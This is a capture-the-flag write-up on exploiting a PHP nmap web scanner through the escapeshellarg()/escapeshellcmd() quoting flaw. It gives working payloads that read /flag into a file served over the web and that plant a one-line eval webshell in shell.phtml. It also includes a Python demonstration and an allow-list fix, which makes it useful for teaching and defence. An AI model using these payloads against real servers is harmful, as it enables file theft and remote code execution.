[朱雀组]Nmap

Let's look at the source:

index.php

<?
require('settings.php');


set_time_limit(0);
if (isset($_POST['host'])):
	if (!defined('WEB_SCANS')) {
		die('Web scans disabled');
	}

	$host = $_POST['host'];
	// the only input filter: reject anything containing "php" (case-insensitive)
	if(stripos($host,'php')!==false){
		die("Hacker...");
	}
	// escapeshellarg() and then escapeshellcmd() on the same value:
	// the second call escapes the quotes and backslashes the first one added
	$host = escapeshellarg($host);
	$host = escapeshellcmd($host);

	// 5-character output name; the XML report goes to RESULTS_PATH
	$filename = substr(md5(time() . rand(1, 10)), 0, 5);
	// $host is appended last, after the fixed nmap arguments
	$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
	$result_scan = shell_exec($command);
	if (is_null($result_scan)) {
		die('Something went wrong');
	} else {
		header('Location: result.php?f=' . $filename);
	}
else:
?>

settings.php:

<?
# Path where all files stored
# Example values: /home/node/results/
# Or just: xml/
# Must be readable/writable for web server! so chmod 777 xml/
define('RESULTS_PATH', 'xml/');

# Nmap string arguments for web scanning
# Example: -sV -Pn
define('NMAP_ARGS', '-Pn -T4 -F --host-timeout 1000ms');

# Comment this line to disable web scans
define('WEB_SCANS', 'enable');

# URL of application
# for example: http://example.com/scanner/
# Or just: /scanner/
define('APP_URL', '/');

# Secret word to protect webface (reserved)
# Uncomment to set it!
# define('secret_word', 'passw0rd1337');

?>

The key lines:

$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);

After substituting the constants from settings.php this is equivalent to:

$ nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/$filename $host

$host is the last thing on the command line, so anything that survives the escaping as separate shell words becomes extra nmap options.

Method 1: read the flag straight into an output file

  • -iL: load the scan targets from a file

  • -oN: write the scan results in nmap's "normal" text format

 ' -iL /flag -oN flag.txt '

The leading and trailing single quotes are what make this work. escapeshellarg() wraps the value in single quotes and rewrites each embedded ' as '\''; escapeshellcmd() then backslash-escapes the backslashes it finds and leaves the (now paired) quotes alone, so the argument reaches the shell as ''\\'' -iL /flag -oN flag.txt '\\'''. The quote pairs collapse to empty strings, the two escaped backslashes become harmless unresolvable "hosts" (\ and \\), and -iL /flag -oN flag.txt is passed to nmap as separate options. nmap reads /flag as a target list, fails to resolve the flag text as a hostname, and records that failure, flag included, in flag.txt. The file is written to nmap's working directory, the same web root directory that xml/ lives in, so it can be fetched over HTTP.

Open flag.txt.

Method 2: one-line webshell, getting past the php filter

'<?=eval($_GET[oatmeal]);?> -oN shell.phtml '

stripos($host,'php') is the only filter, and it blocks the substring "php" wherever it appears, so neither a .php filename nor a <?php open tag can be submitted. Both are avoided here: the short echo tag <?= opens PHP without spelling "php", and .phtml does not contain "php" as a substring while still being served as PHP under Apache's stock php module configuration (check the target's handler mapping; some builds only map .php). The same quote trick as in method 1 splits the input, nmap records the unresolvable "host" <?=eval($_GET[oatmeal]);?> in shell.phtml, and the PHP on that line runs whenever the file is requested, with the code to execute supplied in the oatmeal parameter. The array key is deliberately left unquoted, because a ' would be mangled by escapeshellarg() and a paired " would be stripped by the shell; PHP 7 treats the bare word as the string "oatmeal" with a notice, whereas PHP 8 throws on an undefined constant, so this payload assumes a PHP 7 target.
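To see exactly what reaches nmap in both methods, here is an added example (not part of the original writeup or of the challenge's code) that re-implements PHP's escapeshellarg() and escapeshellcmd() in Python from their documented non-Windows behaviour, rebuilds the command string the way index.php does, and splits it with POSIX shell quoting rules via shlex. The output name xml/abcde, the is_valid_target() allow-list and its regular expression are assumptions made for the demonstration, not something from the page.

```python
"""
Port of PHP's escapeshellarg()/escapeshellcmd() (non-Windows behaviour),
used to show what the scanner's $host becomes on the nmap command line.
Added example; not the challenge's own code.
"""
import re
import shlex

# Characters that escapeshellcmd() prefixes with a backslash (ext/standard/exec.c).
# Quotes are handled separately: a quote is left alone only while it can be
# paired with a later quote of the same kind, otherwise it is escaped too.
_CMD_META = set('#&;`|*?~<>^()[]{}$\\\n\xff')

NMAP_ARGS = "-Pn -T4 -F --host-timeout 1000ms"   # from settings.php
RESULTS_PATH = "xml/"                            # from settings.php

# Assumed allow-list for the hardened check: hostname / IPv4 / IPv6 characters only.
_TARGET_RE = re.compile(r"^[A-Za-z0-9.\-:]{1,253}$")


def escapeshellarg(s: str) -> str:
    """PHP escapeshellarg(): single-quote the string, rewriting ' as '\\''."""
    return "'" + s.replace("'", "'\\''") + "'"


def escapeshellcmd(s: str) -> str:
    """PHP escapeshellcmd(): backslash-escape metacharacters and unpaired quotes."""
    out = []
    pending = None            # quote char whose closing partner is still ahead
    for i, ch in enumerate(s):
        if ch in ("'", '"'):
            if pending is None and ch in s[i + 1:]:
                pending = ch              # opening quote with a partner later on
            elif pending == ch:
                pending = None            # its closing partner
            else:
                out.append("\\")          # unpaired or mismatched quote
            out.append(ch)
        elif ch in _CMD_META:
            out.append("\\" + ch)
        else:
            out.append(ch)
    return "".join(out)


def is_blocked(host: str) -> bool:
    """The scanner's only filter: stripos($host, 'php') !== false."""
    return "php" in host.lower()


def build_command(host: str, filename: str = "abcde") -> str:
    """Reproduce index.php: escapeshellarg, then escapeshellcmd, then concatenate."""
    host = escapeshellcmd(escapeshellarg(host))
    return f"nmap {NMAP_ARGS} -oX {RESULTS_PATH}{filename} {host}"


def nmap_argv(host: str, filename: str = "abcde") -> list[str]:
    """Split the command the way /bin/sh would, giving nmap's actual argv."""
    return shlex.split(build_command(host, filename))


def extra_args(host: str) -> list[str]:
    """Everything that lands on nmap's argv after the intended -oX output path."""
    argv = nmap_argv(host)
    return argv[argv.index("-oX") + 2:]


def is_valid_target(host: str) -> bool:
    """Hardened replacement for the 'php' blacklist: allow-list the target
    and refuse anything that would parse as an option."""
    return bool(_TARGET_RE.match(host)) and not host.startswith("-")


if __name__ == "__main__":
    for payload in ("' -iL /flag -oN flag.txt '",
                    "'<?=eval($_GET[oatmeal]);?> -oN shell.phtml '"):
        print(build_command(payload))
        print("  nmap argv tail:", extra_args(payload))
        print("  blocked by 'php' filter:", is_blocked(payload),
              "| passes allow-list:", is_valid_target(payload))
```

Running it prints, for each payload, the shell command and the arguments nmap actually receives: for method 1 the tail is ['\\', '-iL', '/flag', '-oN', 'flag.txt', '\\\\'], and for method 2 the webshell arrives as the single token \<?=eval($_GET[oatmeal]);?> (the leading backslash is a leftover of the escaping and does not stop PHP from recognising the <?= tag once nmap writes the token into shell.phtml). is_valid_target() is the fix that matters: an allow-list of hostname and IP characters plus a leading-dash check rejects both payloads, whereas the blacklist on "php" rejects neither.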
